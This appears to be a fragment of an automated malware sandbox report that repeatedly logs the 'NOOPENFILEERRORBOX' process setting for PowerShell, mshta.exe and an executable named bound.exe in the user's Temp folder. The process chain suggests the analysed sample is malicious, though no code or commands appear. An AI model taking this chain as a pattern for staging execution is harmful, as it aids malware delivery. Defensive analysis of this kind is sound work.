              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
